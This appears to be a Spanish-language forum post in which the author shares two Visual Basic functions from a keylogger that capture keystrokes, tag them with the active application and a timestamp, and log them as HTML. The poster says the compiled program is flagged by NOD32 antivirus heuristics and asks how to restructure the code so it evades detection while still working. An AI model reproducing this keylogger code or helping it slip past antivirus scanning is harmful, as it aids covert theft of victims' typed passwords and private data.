Necesito que me confirmen....
Si en un Modulo tengo estas 2 funciones:
Código:
Public Function FireEvent(ByVal intKey As Integer, ByVal strKeyName As String, ByVal bIsFunctionKey As Boolean, ByVal strInApplication As String)
On Error Resume Next
If strInApplication = strLastApplication Then
Tecla_Presionada intKey, strKeyName, bIsFunctionKey, strInApplication, False
Else
Tecla_Presionada intKey, strKeyName, bIsFunctionKey, strInApplication, True
strLastApplication = strInApplication
End If
End Function
Código:
Public Function Tecla_Presionada(ByVal intKey As Integer, ByVal strKeyName As String, ByVal bIsFunctionKey As Boolean, ByVal strInApplication As String, ByVal vCambio_De_Aplicacion As Boolean)
If vCambio_De_Aplicacion Then
If Not FMain.txt.Text = "" Then
FMain.txt.Text = FMain.txt.Text & vbNewLine & vbNewLine
End If
FMain.txt.Text = FMain.txt.Text & "<hr><b>...:::." & Now & ":::...<br>" & strInApplication & "</b><hr><br>" & vbNewLine
If bIsFunctionKey Then
FMain.txt.Text = FMain.txt.Text & strKeyName
Else
FMain.txt.Text = FMain.txt.Text & Chr(intKey)
End If
Else
If bIsFunctionKey Then
FMain.txt.Text = FMain.txt.Text & strKeyName
Else
FMain.txt.Text = FMain.txt.Text & Chr(intKey)
End If
End If
End Function
Es detectada por la heuristica?
Se puede lograr meter alguna funcion dentro de otra? no verdad?

Esto ya me tiene desesperado, no logro burlar la heuristica del NOD!
Se que el problema esta ahi porque si quito alguna parte del code ya no es detectado el EXE pero queda inservible xD
Alguna recomendacion?
Saludos